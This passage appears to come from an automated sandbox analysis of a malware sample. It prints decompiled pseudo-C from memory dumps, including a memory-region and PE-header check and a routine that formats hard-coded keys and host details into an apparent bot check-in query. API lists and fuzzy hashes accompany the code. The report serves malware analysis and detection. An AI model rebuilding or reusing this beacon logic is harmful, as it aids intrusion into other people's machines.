                                                          								__eflags = _t61;
                                                          								if(_t61 < 0) {
                                                          									_t62 = 0;
                                                          									__eflags = 0;
                                                          								} else {
                                                          									_t62 = _a4;
                                                          								}
                                                          								__eflags = _t62;
                                                          								if(_t62 == 0) {
                                                          									L59:
                                                          									_t63 = _t104;
                                                          									goto L60;
                                                          								} else {
                                                          									__eflags = _v12 - 0x1000000;
                                                          									if(_v12 != 0x1000000) {
                                                          										goto L59;
                                                          									}
                                                          									__eflags = _v16 & 0x000000cc;
                                                          									if((_v16 & 0x000000cc) == 0) {
                                                          										L46:
                                                          										_t63 = 1;
                                                          										 *0x5ed328 = 1;
                                                          										__eflags =  *0x5ed328;
                                                          										if( *0x5ed328 != 0) {
                                                          											goto L60;
                                                          										}
                                                          										_t84 =  *0x5ed2e0; // 0x0
                                                          										__eflags = _t84;
                                                          										_t93 = _t84;
                                                          										if(_t84 <= 0) {
                                                          											L51:
                                                          											__eflags = _t93;
                                                          											if(_t93 != 0) {
                                                          												L58:
                                                          												 *0x5ed328 = 0;
                                                          												goto L5;
                                                          											}
                                                          											_t77 = 0xf;
                                                          											__eflags = _t84 - _t77;
                                                          											if(_t84 <= _t77) {
                                                          												_t77 = _t84;
                                                          											}
                                                          											_t94 = 0;
                                                          											__eflags = _t77;
                                                          											if(_t77 < 0) {
                                                          												L56:
                                                          												__eflags = _t84 - 0x10;
                                                          												if(_t84 < 0x10) {
                                                          													_t86 = _t84 + 1;
                                                          													__eflags = _t86;
                                                          													 *0x5ed2e0 = _t86;
                                                          												}
                                                          												goto L58;
                                                          											} else {
                                                          												do {
                                                          													_t68 = 0x5ed2e8 + _t94 * 4;
                                                          													_t94 = _t94 + 1;
                                                          													__eflags = _t94 - _t77;
                                                          													 *_t68 = _t110;
                                                          													_t110 =  *_t68;
                                                          												} while (_t94 <= _t77);
                                                          												goto L56;
                                                          											}
                                                          										}
                                                          										_t69 = 0x5ed2e4 + _t84 * 4;
                                                          										while(1) {
                                                          											__eflags =  *_t69 - _t110;
                                                          											if( *_t69 == _t110) {
                                                          												goto L51;
                                                          											}
                                                          											_t93 = _t93 - 1;
                                                          											_t69 = _t69 - 4;
                                                          											__eflags = _t93;
                                                          											if(_t93 > 0) {
                                                          												continue;
                                                          											}
                                                          											goto L51;
                                                          										}
                                                          										goto L51;
                                                          									}
                                                          									_t87 = _v32;
                                                          									__eflags =  *_t87 - 0x5a4d;
                                                          									if( *_t87 != 0x5a4d) {
                                                          										goto L59;
                                                          									}
                                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                          									__eflags =  *_t71 - 0x4550;
                                                          									if( *_t71 != 0x4550) {
                                                          										goto L59;
                                                          									}
                                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                          										goto L59;
                                                          									}
                                                          									_t78 = _t76 - _t87;
                                                          									__eflags =  *((short*)(_t71 + 6));
                                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                                          										goto L59;
                                                          									}
                                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                          									__eflags = _t78 - _t72;
                                                          									if(_t78 < _t72) {
                                                          										goto L46;
                                                          									}
                                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                          										goto L46;
                                                          									}
                                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                          										goto L20;
                                                          									}
                                                          									goto L46;
                                                          								}
                                                          							} else {
                                                          								goto L16;
                                                          							}
                                                          							while(1) {
                                                          								L16:
                                                          								__eflags =  *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) - _t110;
                                                          								if( *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) == _t110) {
                                                          									break;
                                                          								}
                                                          								_t58 = _t58 + 1;
                                                          								__eflags = _t58 - _t81;
                                                          								if(_t58 < _t81) {
                                                          									continue;
                                                          								}
                                                          								goto L18;
                                                          							}
                                                          							__eflags = _t58;
                                                          							if(_t58 <= 0) {
                                                          								goto L5;
                                                          							}
                                                          							 *0x5ed328 = 1;
                                                          							__eflags =  *0x5ed328;
                                                          							if( *0x5ed328 != 0) {
                                                          								goto L5;
                                                          							}
                                                          							__eflags =  *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) - _t110;
                                                          							if( *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) == _t110) {
                                                          								L32:
                                                          								_t100 = 0;
                                                          								__eflags = _t58;
                                                          								if(_t58 < 0) {
                                                          									L34:
                                                          									 *0x5ed328 = 0;
                                                          									goto L5;
                                                          								} else {
                                                          									goto L33;
                                                          								}
                                                          								do {
                                                          									L33:
                                                          									_t90 = 0x5ed2e8 + _t100 * 4;
                                                          									_t100 = _t100 + 1;
                                                          									__eflags = _t100 - _t58;
                                                          									 *_t90 = _t110;
                                                          									_t110 =  *_t90;
                                                          								} while (_t100 <= _t58);
                                                          								goto L34;
                                                          							}
                                                          							_t25 = _t81 - 1; // -1
                                                          							_t58 = _t25;
                                                          							__eflags = _t58;
                                                          							if(_t58 < 0) {
                                                          								L28:
                                                          								__eflags = _t81 - 0x10;
                                                          								if(_t81 < 0x10) {
                                                          									_t81 = _t81 + 1;
                                                          									__eflags = _t81;
                                                          									 *0x5ed2e0 = _t81;
                                                          								}
                                                          								_t28 = _t81 - 1; // 0x0
                                                          								_t58 = _t28;
                                                          								goto L32;
                                                          							} else {
                                                          								goto L25;
                                                          							}
                                                          							while(1) {
                                                          								L25:
                                                          								__eflags =  *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) - _t110;
                                                          								if( *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) == _t110) {
                                                          									break;
                                                          								}
                                                          								_t58 = _t58 - 1;
                                                          								__eflags = _t58;
                                                          								if(_t58 >= 0) {
                                                          									continue;
                                                          								}
                                                          								break;
                                                          							}
                                                          							__eflags = _t58;
                                                          							if(__eflags >= 0) {
                                                          								if(__eflags == 0) {
                                                          									goto L34;
                                                          								}
                                                          								goto L32;
                                                          							}
                                                          							goto L28;
                                                          						}
                                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                          						__eflags = _t75 - _v8;
                                                          						if(_t75 < _v8) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _t75 - _t108;
                                                          						if(_t75 >= _t108) {
                                                          							goto L20;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					L5:
                                                          					_t63 = 1;
                                                          					goto L60;
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}





































                                                          APIs
                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 005EB256
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: MemoryQueryVirtual
                                                          • String ID:
                                                          • API String ID: 2850889275-0
                                                          • Opcode ID: c0f8d585c373f89eeb161d4691e07d797f2c0720426d7d603fcb04857eaf6caa
                                                          • Instruction ID: 4b42b2d790c884d639979825349fe2eb99447269c4a842a4fa4406b18d371a0b
                                                          • Opcode Fuzzy Hash: c0f8d585c373f89eeb161d4691e07d797f2c0720426d7d603fcb04857eaf6caa
                                                          • Instruction Fuzzy Hash: B161D534A006C68BEB2DCB6AC8D162B7BB1FF89352B248928DAD5CB195E730DD41C750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c
                                                          • API String ID: 0-3674199949
                                                          • Opcode ID: 828266d287079a67e90bb63de15d039b8ebdc90fbf9156d09c1244c441a8cb29
                                                          • Instruction ID: 3e93e3dd3c109643957f8861015970eda04c4c469a0c1bde566b1b27e8379674
                                                          • Opcode Fuzzy Hash: 828266d287079a67e90bb63de15d039b8ebdc90fbf9156d09c1244c441a8cb29
                                                          • Instruction Fuzzy Hash: E8513A36A0011ADFEF19CF80ED80BA9B7B5FF84724F159196D8086B216D330AE81DF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c
                                                          • API String ID: 0-3674199949
                                                          • Opcode ID: 9be74e8784058956d3d0e1d51691f2de95a7e6e82703f31b8ffc071a0f4e2f9d
                                                          • Instruction ID: 925f4a17889e56e567bc882ce7c7da27f63af426d1b90e5df13bca6c3007e9b3
                                                          • Opcode Fuzzy Hash: 9be74e8784058956d3d0e1d51691f2de95a7e6e82703f31b8ffc071a0f4e2f9d
                                                          • Instruction Fuzzy Hash: 88513C37900219DFEF29CF44ED84BA9B7B5FB84720F164596D948AB212D330AE85DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c
                                                          • API String ID: 0-3674199949
                                                          • Opcode ID: abaadb2879f379325fb3bbad3f9210c685a4b7abdd33d206becd0bd23f4365f0
                                                          • Instruction ID: 2ba898d9843709d55ae23a564de199444092d96110ddec2f3b7443f3d8dfa96a
                                                          • Opcode Fuzzy Hash: abaadb2879f379325fb3bbad3f9210c685a4b7abdd33d206becd0bd23f4365f0
                                                          • Instruction Fuzzy Hash: 83418C76A00215DFEB25CF94DD80BA9B7B5FF88B20F159199D9496B356C330AE80CF84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c
                                                          • API String ID: 0-3674199949
                                                          • Opcode ID: cb4569934cfb242ab8479b452e4947835aa05f6b5d33f9c3cac1d2f6c4cfee46
                                                          • Instruction ID: 0124c02e40505f86805df9e37470596f0c3ee253a22d965a8f1cc258ad30eed1
                                                          • Opcode Fuzzy Hash: cb4569934cfb242ab8479b452e4947835aa05f6b5d33f9c3cac1d2f6c4cfee46
                                                          • Instruction Fuzzy Hash: 3C415F36900219DFEB25DF44ED84BA9B7B5FF88B20F159196D8486B316D330AE85DF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a5a822f048ab97aed3860515fa9c210a1164ba75451d97788b306884a8adc05
                                                          • Instruction ID: 59bda47f945de4e9f54359d5d901e5c2174c534a9bfcc7e2af8ba395cf87635b
                                                          • Opcode Fuzzy Hash: 7a5a822f048ab97aed3860515fa9c210a1164ba75451d97788b306884a8adc05
                                                          • Instruction Fuzzy Hash: F62172864802A13FFFF254B895BB3D717A8C76B7D0FA5B819C8108B582945C279F7280
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 917b2a3dae72067c6ea85b97dde3592e1f4505ed00f386ed982949e072a7d54e
                                                          • Instruction ID: 36089c5b7bbc9b36a396397b27ed7fbb17e3de091ac510888181af3bc773516c
                                                          • Opcode Fuzzy Hash: 917b2a3dae72067c6ea85b97dde3592e1f4505ed00f386ed982949e072a7d54e
                                                          • Instruction Fuzzy Hash: CE2183864402A13FFFF254B895BB3C717A8C76B7D0FA5B819C8108B582945C27DF7280
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 71%
                                                          			E10002184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				void* __ebp;
                                                          				signed int* _t43;
                                                          				char _t44;
                                                          				void* _t46;
                                                          				void* _t49;
                                                          				intOrPtr* _t53;
                                                          				void* _t54;
                                                          				void* _t65;
                                                          				long _t66;
                                                          				signed int* _t80;
                                                          				signed int* _t82;
                                                          				void* _t84;
                                                          				signed int _t86;
                                                          				void* _t89;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t99;
                                                          				void* _t106;
                                                          
                                                          				_t43 = _t84;
                                                          				_t65 = __ebx + 2;
                                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                          				_t89 = _t95;
                                                          				_t96 = _t95 - 8;
                                                          				_push(_t65);
                                                          				_push(_t84);
                                                          				_push(_t89);
                                                          				asm("cld");
                                                          				_t66 = _a8;
                                                          				_t44 = _a4;
                                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                          					_push(_t89);
                                                          					E100022EB(_t66 + 0x10, _t66, 0xffffffff);
                                                          					_t46 = 1;
                                                          				} else {
                                                          					_v12 = _t44;
                                                          					_v8 = _a12;
                                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                          					_t86 =  *(_t66 + 0xc);
                                                          					_t80 =  *(_t66 + 8);
                                                          					_t49 = E100023A5(_t66);
                                                          					_t99 = _t96 + 4;
                                                          					if(_t49 == 0) {
                                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                          						goto L11;
                                                          					} else {
                                                          						while(_t86 != 0xffffffff) {
                                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                          							if(_t53 == 0) {
                                                          								L8:
                                                          								_t80 =  *(_t66 + 8);
                                                          								_t86 = _t80[_t86 + _t86 * 2];
                                                          								continue;
                                                          							} else {
                                                          								_t54 =  *_t53();
                                                          								_t89 = _t89;
                                                          								_t86 = _t86;
                                                          								_t66 = _a8;
                                                          								_t55 = _t54;
                                                          								_t106 = _t54;
                                                          								if(_t106 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									if(_t106 < 0) {
                                                          										_t46 = 0;
                                                          									} else {
                                                          										_t82 =  *(_t66 + 8);
                                                          										E10002290(_t55, _t66);
                                                          										_t89 = _t66 + 0x10;
                                                          										E100022EB(_t89, _t66, 0);
                                                          										_t99 = _t99 + 0xc;
                                                          										E10002387(_t82[2]);
                                                          										 *(_t66 + 0xc) =  *_t82;
                                                          										_t66 = 0;
                                                          										_t86 = 0;
                                                          										 *(_t82[2])(1);
                                                          										goto L8;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						L11:
                                                          						_t46 = 1;
                                                          					}
                                                          				}
                                                          				L13:
                                                          				return _t46;
                                                          			}























                                                          0x10002188
                                                          0x10002189
                                                          0x1000218a
                                                          0x1000218d
                                                          0x1000218f
                                                          0x10002192
                                                          0x10002193
                                                          0x10002195
                                                          0x10002196
                                                          0x10002197
                                                          0x1000219a
                                                          0x100021a4
                                                          0x10002255
                                                          0x1000225c
                                                          0x10002265
                                                          0x100021aa
                                                          0x100021aa
                                                          0x100021b0
                                                          0x100021b6
                                                          0x100021b9
                                                          0x100021bc
                                                          0x100021c0
                                                          0x100021c5
                                                          0x100021ca
                                                          0x1000224a
                                                          0x00000000
                                                          0x100021cc
                                                          0x100021cc
                                                          0x100021d8
                                                          0x100021da
                                                          0x10002235
                                                          0x10002235
                                                          0x1000223b
                                                          0x00000000
                                                          0x100021dc
                                                          0x100021eb
                                                          0x100021ed
                                                          0x100021ee
                                                          0x100021ef
                                                          0x100021f2
                                                          0x100021f2
                                                          0x100021f4
                                                          0x00000000
                                                          0x100021f6
                                                          0x100021f6
                                                          0x10002240
                                                          0x100021f8
                                                          0x100021f8
                                                          0x100021fc
                                                          0x10002204
                                                          0x10002209
                                                          0x1000220e
                                                          0x1000221a
                                                          0x10002222
                                                          0x10002229
                                                          0x1000222f
                                                          0x10002233
                                                          0x00000000
                                                          0x10002233
                                                          0x100021f6
                                                          0x100021f4
                                                          0x00000000
                                                          0x100021da
                                                          0x1000224e
                                                          0x1000224e
                                                          0x1000224e
                                                          0x100021ca
                                                          0x1000226a
                                                          0x10002271

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                          • Instruction ID: adb68764e4b497ef4a4b49f2527e322eb7aaba1ac7dc589ecd7eb92557e13467
                                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                          • Instruction Fuzzy Hash: 9221CB76900205AFD710DFA8CCC09A7F7A5FF49390B468169ED599B249D730FA15C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 71%
                                                          			E005EAF80(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				void* __ebp;
                                                          				signed int* _t43;
                                                          				char _t44;
                                                          				void* _t46;
                                                          				void* _t49;
                                                          				intOrPtr* _t53;
                                                          				void* _t54;
                                                          				void* _t65;
                                                          				long _t66;
                                                          				signed int* _t80;
                                                          				signed int* _t82;
                                                          				void* _t84;
                                                          				signed int _t86;
                                                          				void* _t89;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t99;
                                                          				void* _t106;
                                                          
                                                          				_t43 = _t84;
                                                          				_t65 = __ebx + 2;
                                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                          				_t89 = _t95;
                                                          				_t96 = _t95 - 8;
                                                          				_push(_t65);
                                                          				_push(_t84);
                                                          				_push(_t89);
                                                          				asm("cld");
                                                          				_t66 = _a8;
                                                          				_t44 = _a4;
                                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                          					_push(_t89);
                                                          					E005EB0EB(_t66 + 0x10, _t66, 0xffffffff);
                                                          					_t46 = 1;
                                                          				} else {
                                                          					_v12 = _t44;
                                                          					_v8 = _a12;
                                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                          					_t86 =  *(_t66 + 0xc);
                                                          					_t80 =  *(_t66 + 8);
                                                          					_t49 = E005EB1A5(_t66);
                                                          					_t99 = _t96 + 4;
                                                          					if(_t49 == 0) {
                                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                          						goto L11;
                                                          					} else {
                                                          						while(_t86 != 0xffffffff) {
                                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                          							if(_t53 == 0) {
                                                          								L8:
                                                          								_t80 =  *(_t66 + 8);
                                                          								_t86 = _t80[_t86 + _t86 * 2];
                                                          								continue;
                                                          							} else {
                                                          								_t54 =  *_t53();
                                                          								_t89 = _t89;
                                                          								_t86 = _t86;
                                                          								_t66 = _a8;
                                                          								_t55 = _t54;
                                                          								_t106 = _t54;
                                                          								if(_t106 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									if(_t106 < 0) {
                                                          										_t46 = 0;
                                                          									} else {
                                                          										_t82 =  *(_t66 + 8);
                                                          										E005EB090(_t55, _t66);
                                                          										_t89 = _t66 + 0x10;
                                                          										E005EB0EB(_t89, _t66, 0);
                                                          										_t99 = _t99 + 0xc;
                                                          										E005EB187(_t82[2]);
                                                          										 *(_t66 + 0xc) =  *_t82;
                                                          										_t66 = 0;
                                                          										_t86 = 0;
                                                          										 *(_t82[2])(1);
                                                          										goto L8;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						L11:
                                                          						_t46 = 1;
                                                          					}
                                                          				}
                                                          				L13:
                                                          				return _t46;
                                                          			}
























                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction ID: d2c891dfe34f2cdb5abcaf9bcb438b8fde74134e2f18bcad10a9530a908591cd
                                                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction Fuzzy Hash: B821F8729002459FEB18DF69C8C89ABBFA5FF48360B058169EDA5CB245D730FA15C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae04c179fc591aad29b6f3858bcf89de9e30963d532af2466741a672dbbf26e5
                                                          • Instruction ID: 153f5259ab1a04b0fee6bee9682a44f972211defaa8fc1e1418adf5a20c57bd9
                                                          • Opcode Fuzzy Hash: ae04c179fc591aad29b6f3858bcf89de9e30963d532af2466741a672dbbf26e5
                                                          • Instruction Fuzzy Hash: 8DE0B6B6901118FEFF568A44CC48FFAB7BDEBC4700F1481E2E609AA060C6315E848F20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E005E1F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v44;
                                                          				intOrPtr _v52;
                                                          				void* __edi;
                                                          				long _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t33;
                                                          				intOrPtr _t34;
                                                          				int _t37;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t71;
                                                          				intOrPtr _t74;
                                                          				int _t77;
                                                          				intOrPtr _t78;
                                                          				int _t81;
                                                          				intOrPtr _t83;
                                                          				int _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				intOrPtr _t98;
                                                          				void* _t100;
                                                          				int _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          
                                                          				_t95 = __edx;
                                                          				_t91 = __ecx;
                                                          				_t25 = __eax;
                                                          				_t105 = _a16;
                                                          				_v4 = 8;
                                                          				if(__eax == 0) {
                                                          					_t25 = GetTickCount();
                                                          				}
                                                          				_t26 =  *0x5ed018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t27 =  *0x5ed014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t28 =  *0x5ed010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t29 = E005ED00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t30 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t3 = _t30 + 0x5ee633; // 0x74666f73
                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x5ed02c,  *0x5ed004, _t25);
                                                          				_t33 = E005E56CD();
                                                          				_t34 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t4 = _t34 + 0x5ee673; // 0x74707526
                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                          				_t108 = _t106 + 0x38;
                                                          				_t102 = _t101 + _t37;
                                                          				_t96 = E005E58DB(_t91);
                                                          				if(_t96 != 0) {
                                                          					_t83 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t6 = _t83 + 0x5ee8d4; // 0x736e6426
                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t86;
                                                          					HeapFree( *0x5ed238, 0, _t96);
                                                          				}
                                                          				_t97 = E005EA199();
                                                          				if(_t97 != 0) {
                                                          					_t78 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t8 = _t78 + 0x5ee8dc; // 0x6f687726
                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t81;
                                                          					HeapFree( *0x5ed238, 0, _t97);
                                                          				}
                                                          				_t98 =  *0x5ed32c; // 0x16695b0
                                                          				_a32 = E005E4622(0x5ed00a, _t98 + 4);
                                                          				_t42 =  *0x5ed2d0; // 0x0
                                                          				if(_t42 != 0) {
                                                          					_t74 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t11 = _t74 + 0x5ee8b6; // 0x3d736f26
                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t77;
                                                          				}
                                                          				_t43 =  *0x5ed2cc; // 0x0
                                                          				if(_t43 != 0) {
                                                          					_t71 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t13 = _t71 + 0x5ee88d; // 0x3d706926
                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                          				}
                                                          				if(_a32 != 0) {
                                                          					_t100 = RtlAllocateHeap( *0x5ed238, 0, 0x800);
                                                          					if(_t100 != 0) {
                                                          						E005E518F(GetTickCount());
                                                          						_t50 =  *0x5ed32c; // 0x16695b0
                                                          						__imp__(_t50 + 0x40);
                                                          						asm("lock xadd [eax], ecx");
                                                          						_t54 =  *0x5ed32c; // 0x16695b0
                                                          						__imp__(_t54 + 0x40);
                                                          						_t56 =  *0x5ed32c; // 0x16695b0
                                                          						_t103 = E005E1BB6(1, _t95, _t105,  *_t56);
                                                          						asm("lock xadd [eax], ecx");
                                                          						if(_t103 != 0) {
                                                          							StrTrimA(_t103, 0x5ec28c);
                                                          							_push(_t103);
                                                          							_t62 = E005E361A();
                                                          							_v16 = _t62;
                                                          							if(_t62 != 0) {
                                                          								_t89 = __imp__;
                                                          								 *_t89(_t103, _v0);
                                                          								 *_t89(_t100, _a4);
                                                          								_t90 = __imp__;
                                                          								 *_t90(_t100, _v28);
                                                          								 *_t90(_t100, _t103);
                                                          								_t68 = E005E6777(0xffffffffffffffff, _t100, _v28, _v24);
                                                          								_v52 = _t68;
                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                          									E005E6761();
                                                          								}
                                                          								HeapFree( *0x5ed238, 0, _v44);
                                                          							}
                                                          							HeapFree( *0x5ed238, 0, _t103);
                                                          						}
                                                          						HeapFree( *0x5ed238, 0, _t100);
                                                          					}
                                                          					HeapFree( *0x5ed238, 0, _a24);
                                                          				}
                                                          				HeapFree( *0x5ed238, 0, _t105);
                                                          				return _a12;
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 005E1F2A
                                                          • wsprintfA.USER32 ref: 005E1F77
                                                          • wsprintfA.USER32 ref: 005E1F94
                                                          • wsprintfA.USER32 ref: 005E1FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E1FC7
                                                          • wsprintfA.USER32 ref: 005E1FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E1FF9
                                                          • wsprintfA.USER32 ref: 005E2030
                                                          • wsprintfA.USER32 ref: 005E2050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E206D
                                                          • GetTickCount.KERNEL32 ref: 005E207D
                                                          • RtlEnterCriticalSection.NTDLL(01669570), ref: 005E2091
                                                          • RtlLeaveCriticalSection.NTDLL(01669570), ref: 005E20AF
                                                            • Part of subcall function 005E1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,005E20C2,?,016695B0), ref: 005E1BE1
